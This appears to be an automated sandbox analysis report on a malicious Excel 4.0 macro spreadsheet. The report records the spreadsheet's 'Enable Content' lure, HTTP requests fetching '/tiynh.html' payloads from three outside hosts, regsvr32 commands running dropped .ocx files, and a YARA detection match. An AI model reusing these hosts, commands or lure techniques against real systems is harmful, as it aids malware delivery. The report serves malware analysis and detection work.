Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.com/search/api/v2/initMBI_SSL
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.com6
Source: EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.comP
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://substrate.office.comk
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://tasks.office.com
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://tellmeservice.osi.office.netst
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.htmlInsightsImmersivehttps
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices$
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.292807285.000000000FD13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.455555812.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.437009645.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450064397.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.453830706.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253003771.000000000FD2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.451668496.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.427027143.000000000FD05000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.458279440.000000000FD05000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ExchangeAutoDiscoverhttps:/
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: EXCEL.EXE, 00000000.00000003.253135946.0000000013212000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://webshell.suite.office.comOCSettingsCloudPolicyServiceAndroidUrlhttps://clients.config.office
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosM
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258140195.000000001313E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253149330.0000000013141000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: EXCEL.EXE, 00000000.00000003.253072813.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252935992.0000000013211000.00000004.00000001.sdmp	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2Azur
Source: EXCEL.EXE, 00000000.00000003.252828712.000000001311D000.00000004.00000001.sdmp, 62A0C483-7525-45C3-9021-D9D0BAA7B779.0.dr	String found in binary or memory: https://www.odwebp.svc.ms
Source: EXCEL.EXE, 00000000.00000003.489648269.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.252949631.0000000013231000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488053927.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.258258859.0000000013211000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253964158.0000000013222000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253858844.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.489986433.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.436041356.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429500983.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.457436502.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.488916746.000000001321B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.253762182.000000001321D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.450974466.000000001321B000.00000004.00000001.sdmp	String found in binary or memory: https://www.odwebp.svc.msom

Source: unknown

DNS traffic detected: queries for: greenflag.esp.br

Source: global traffic	HTTP traffic detected: GET /yuINdRbM/tiynh.html HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: greenflag.esp.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /TSh7GBeIR/tiynh.html HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: noithat117.vnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qJSL1BN5V/tiynh.html HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: playsis.com.brConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 108.179.192.98:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.28.36.171:443 -> 192.168.2.5:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.2.78:443 -> 192.168.2.5:49757 version: TLS 1.2

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 12	Screenshot OCR: Enable Editing o 18 19 20 ljl PROTECTED VIEW Be careful - files from the Internet can contain vir
Source: Screenshot number: 12	Screenshot OCR: Enable Content 25 26 (D SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 30
Source: Document image extraction number: 0	Screenshot OCR: Enable Editing CD PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
Source: Document image extraction number: 0	Screenshot OCR: Enable Content G) SECURITY WARNING Macros have been disabled. Enable Content If you are using a mo
Source: Document image extraction number: 1	Screenshot OCR: Enable Editing 1 PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
Source: Document image extraction number: 1	Screenshot OCR: Enable Content C9 SECURITY WARNING Macros have been disabled. Enable Content om If you are using a
Source: Screenshot number: 16	Screenshot OCR: Enable Editing o 18 19 20 ljl PROTECTED VIEW Be careful - files from the Internet can contain vir
Source: Screenshot number: 16	Screenshot OCR: Enable Content 25 26 (D SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 30

Source: counter-1248368226.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\counter-1248368226.xls, type: DROPPED	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f

Source: counter-1248368226.xls	Macro extractor: Sheet name: Bor3
Source: counter-1248368226.xls	Macro extractor: Sheet name: Bor6
Source: counter-1248368226.xls	Macro extractor: Sheet name: Bor2
Source: counter-1248368226.xls	Macro extractor: Sheet name: Bor1
Source: counter-1248368226.xls	Macro extractor: Sheet name: Bor4
Source: counter-1248368226.xls	Macro extractor: Sheet name: Bor5

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Code function: 0_3_13313938	0_3_13313938
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Code function: 0_3_13315CBE	0_3_13315CBE
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Code function: 0_3_133178AF	0_3_133178AF
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Code function: 0_3_13315C98	0_3_13315C98
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Code function: 0_3_133135EB	0_3_133135EB

Source: counter-1248368226.xls	OLE indicator, VBA macros: true
Source: counter-1248368226.xls.0.dr	OLE indicator, VBA macros: true

Source: A032B20.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: counter-1248368226.xls

ReversingLabs: Detection: 40%

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: counter-1248368226.xls	OLE indicator, Workbook stream: true
Source: counter-1248368226.xls.0.dr	OLE indicator, Workbook stream: true

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx	Jump to behavior

Source: counter-1248368226.xls

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{1568B268-13F6-4616-8738-FC2DE9201C1B} - OProcSessId.dat

Jump to behavior

Source: classification engine

Classification label: mal80.expl.winXLS@7/5@3/4

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: A032B20.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
